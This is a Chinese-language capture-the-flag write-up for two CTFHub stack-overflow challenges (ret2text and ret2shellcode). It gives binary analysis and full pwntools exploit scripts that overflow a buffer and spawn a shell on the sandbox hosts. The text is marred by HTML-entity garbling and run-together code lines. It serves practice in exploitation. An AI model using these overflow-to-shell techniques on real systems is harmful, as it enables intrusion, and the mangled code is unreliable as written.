CTFHub[PWN技能树]——栈溢出

一、ret2text

1. 例行检查,64位程序&＃xff0c;没有开启任何保护
   
2. 本地运行一下情况&＃xff0c;看看大概的情况
   
3. 64位ida载入&＃xff0c;检索程序里的字符串发现了bin/sh
   
   要满足条件才可以执行&＃xff0c;但是我们可以直接跳转到0x4007B8去system&＃xff08;‘/bin/sh’&＃xff09;
   
4. 看main函数
   
   第8行&＃xff0c;gets函数读入没有限制数据的长度&＃xff0c;明显的溢出&＃xff0c;溢出ret到执行system&＃xff08;‘/bin/sh’&＃xff09;的地址即可

from pwn import *#p&＃61;process(&＃39;./pwn1&＃39;)
p&＃61;remote("challenge-79d4d6a23952a67b.sandbox.ctfhub.com",24293)payload&＃61;&＃39;a&＃39;*(0x70&＃43;8)&＃43;p64(0x4007b8)p.sendline(payload)p.interactive()


二、ret2shellcode

1. 例行检查&＃xff0c;64位程序&＃xff0c;仍然未开启任何保护
   
2. 本地运行一下&＃xff0c;看看大概的情况&＃xff0c;可以看到&＃xff0c;给了我们一个栈上的地址
   
3. 64位ida载入&＃xff0c;看main函数
   
   一开始给了我们参数buf在栈上的地址&＃xff0c;然后读入buf&＃xff0c;12行&＃xff0c;buf只有0x10&＃xff0c;但是读入了0x400&＃xff0c;明显的溢出漏洞
4. 这题没有给我们提供现成的后门&＃xff0c;加上没有nx保护&＃xff0c;可以直接执行shellcode来获取shell
   设置一下环境参数&＃xff0c;之后直接用pwntools生成shellcode

context.arch &＃61; &＃39;amd64&＃39;
shellcode &＃61; asm(shellcraft.sh())


5. 有了shellcode&＃xff0c;然后就是shellcode写到哪里的问题
   本地运行的时候加上上图的代码&＃xff0c;可以知道一开始输出了buf参数的地址&＃xff0c;接收一下就获得了栈上的地址

buf_addr &＃61; p.recvuntil("]")
buf_addr &＃61; int(buf_addr[-15:-1], 16)


我们将shellcode写入ret&＃xff0c;这样程序在返回的时候就直接去执行我们的shellcode了
所以我们的shellcode的地址是,0x10是buf的大小&＃xff0c;第一个0x8是ebp&＃xff0c;第二个是ret

shellcode_addr &＃61; buf_addr &＃43; 0x10&＃43;0x8&＃43;0x8


6. shellcode有了&＃xff0c;shellcode的地址也有了&＃xff0c;现在只要往这个地址传入shellcode即可完成利用

payload &＃61; &＃39;a&＃39; * 24 &＃43; p64(shellcode_addr) &＃43; shellcode


完整exp&＃xff1a;

#coding&＃61;utf-8
from pwn import *
import re#context.log_level &＃61; "debug"
context.arch &＃61; &＃39;amd64&＃39;p&＃61;remote("challenge-b841961e5e4c03f8.sandbox.ctfhub.com",37282)#p&＃61;process(&＃39;./pwn2&＃39;)
#gdb.attach(p)buf_addr &＃61; p.recvuntil("]")buf_addr &＃61; int(buf_addr[-15:-1], 16) shellcode_addr &＃61; buf_addr &＃43; 32 shellcode &＃61; asm(shellcraft.sh())payload &＃61; &＃39;a&＃39; * 24 &＃43; p64(shellcode_addr) &＃43; shellcode
p.recv()
p.sendline(payload)
p.interactive()


技能树的题目现在就出了这么多&＃xff0c;出了新的继续更新,接下来尝试历年真题